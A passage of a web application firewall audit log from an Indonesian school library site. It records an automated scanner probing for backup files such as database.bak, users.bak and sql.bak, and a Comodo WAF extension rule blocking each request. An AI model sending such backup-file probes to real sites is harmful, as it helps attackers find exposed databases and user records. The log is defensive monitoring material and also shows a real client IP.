perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.7.4) Gecko/20100101 Firefox/52.7.4 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154009639 --094c216e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --094c216e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200755792 1639 (- - -) Stopwatch2: 1747683200755792 1639; combined=615, p1=324, p2=267, p3=0, p4=0, p5=23, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --094c216e-Z-- --3fd78e7d-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_NQAAAJQ 103.236.140.4 59877 103.236.140.4 8181 --3fd78e7d-B-- GET /members.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118390808 --3fd78e7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3fd78e7d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200753622 6714 (- - -) Stopwatch2: 1747683200753622 6714; combined=497, p1=290, p2=188, p3=0, p4=0, p5=19, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fd78e7d-Z-- --d9f8a617-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEtAAAAMI 103.236.140.4 59826 103.236.140.4 8181 --d9f8a617-B-- GET /backup.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165675011 --d9f8a617-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d9f8a617-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200733566 28203 (- - -) Stopwatch2: 1747683200733566 28203; combined=696, p1=351, p2=311, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9f8a617-Z-- --240e2113-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOE0AAAAMQ 103.236.140.4 58970 103.236.140.4 8181 --240e2113-B-- GET /users.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152502287 --240e2113-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --240e2113-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200753513 8520 (- - -) Stopwatch2: 1747683200753513 8520; combined=606, p1=336, p2=245, p3=0, p4=0, p5=24, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --240e2113-Z-- --5ca08b3a-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nnwAAAEg 103.236.140.4 59470 103.236.140.4 8181 --5ca08b3a-B-- GET /localhost.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165675014 --5ca08b3a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5ca08b3a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200878789 1678 (- - -) Stopwatch2: 1747683200878789 1678; combined=609, p1=354, p2=231, p3=0, p4=0, p5=24, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca08b3a-Z-- --fcdf7113-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOE2gAAAMw 103.236.140.4 59776 103.236.140.4 8181 --fcdf7113-B-- GET /smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.7.3) Gecko/20100101 Firefox/52.7.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160399384 --fcdf7113-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fcdf7113-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200878779 1842 (- - -) Stopwatch2: 1747683200878779 1842; combined=553, p1=262, p2=272, p3=0, p4=0, p5=19, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcdf7113-Z-- --ab503330-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOE6QAAAMI 103.236.140.4 59826 103.236.140.4 8181 --ab503330-B-- GET /127.0.0.1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700068 --ab503330-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ab503330-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".0.0.1.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200886432 1563 (- - -) Stopwatch2: 1747683200886432 1563; combined=618, p1=285, p2=310, p3=0, p4=0, p5=23, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab503330-Z-- --d06e2006-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIongwAAAAI 103.236.140.4 58922 103.236.140.4 8181 --d06e2006-B-- GET /database.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 OPR/51.0.2830.34 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165150732 --d06e2006-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d06e2006-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200887110 1611 (- - -) Stopwatch2: 1747683200887110 1611; combined=621, p1=278, p2=317, p3=0, p4=0, p5=25, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d06e2006-Z-- --dfc35d7b-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_OQAAAIg 103.236.140.4 59818 103.236.140.4 8181 --dfc35d7b-B-- GET /2015.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162430994 --dfc35d7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dfc35d7b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200891181 2066 (- - -) Stopwatch2: 1747683200891181 2066; combined=660, p1=428, p2=213, p3=0, p4=0, p5=19, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc35d7b-Z-- --2392243b-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOE_QAAANA 103.236.140.4 59362 103.236.140.4 8181 --2392243b-B-- GET /dat.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166559750 --2392243b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2392243b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200892893 2088 (- - -) Stopwatch2: 1747683200892893 2088; combined=856, p1=435, p2=388, p3=0, p4=0, p5=33, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2392243b-Z-- --643cbd3c-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOFBQAAAMw 103.236.140.4 59882 103.236.140.4 8181 --643cbd3c-B-- GET /sql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:64.0.2) Gecko/20100101 Firefox/64.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155746331 --643cbd3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --643cbd3c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200895535 1324 (- - -) Stopwatch2: 1747683200895535 1324; combined=529, p1=245, p2=265, p3=0, p4=0, p5=19, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --643cbd3c-Z-- --5b197d11-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9npgAAAE8 103.236.140.4 59444 103.236.140.4 8181 --5b197d11-B-- GET /user.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155746334 --5b197d11-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5b197d11-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200901561 1792 (- - -) Stopwatch2: 1747683200901561 1792; combined=661, p1=423, p2=220, p3=0, p4=0, p5=18, sr=184, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b197d11-Z-- --e080f13b-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonigAAAA8 103.236.140.4 58856 103.236.140.4 8181 --e080f13b-B-- GET /smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 91181268 --e080f13b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e080f13b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200902127 1728 (- - -) Stopwatch2: 1747683200902127 1728; combined=703, p1=368, p2=317, p3=0, p4=0, p5=18, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e080f13b-Z-- --87ee4915-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_QAAAAIk 103.236.140.4 59877 103.236.140.4 8181 --87ee4915-B-- GET /tar.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 OPR/53.0.2907.68 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166526985 --87ee4915-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --87ee4915-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200905074 1562 (- - -) Stopwatch2: 1747683200905074 1562; combined=539, p1=264, p2=252, p3=0, p4=0, p5=23, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87ee4915-Z-- --4b6eab21-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOFIwAAAM0 103.236.140.4 59826 103.236.140.4 8181 --4b6eab21-B-- GET /old.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159108235 --4b6eab21-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b6eab21-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200922451 1533 (- - -) Stopwatch2: 1747683200922451 1533; combined=575, p1=272, p2=279, p3=0, p4=0, p5=24, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b6eab21-Z-- --ea8a8e23-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9nqgAAAFU 103.236.140.4 59470 103.236.140.4 8181 --ea8a8e23-B-- GET /faisunzip.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.3.0) Gecko/20100101 Firefox/52.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162431006 --ea8a8e23-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ea8a8e23-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201298786 1874 (- - -) Stopwatch2: 1747683201298786 1874; combined=656, p1=336, p2=290, p3=0, p4=0, p5=29, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea8a8e23-Z-- --69f9d777-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFPgAAANE 103.236.140.4 59784 103.236.140.4 8181 --69f9d777-B-- GET /error_log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164415186 --69f9d777-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --69f9d777-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 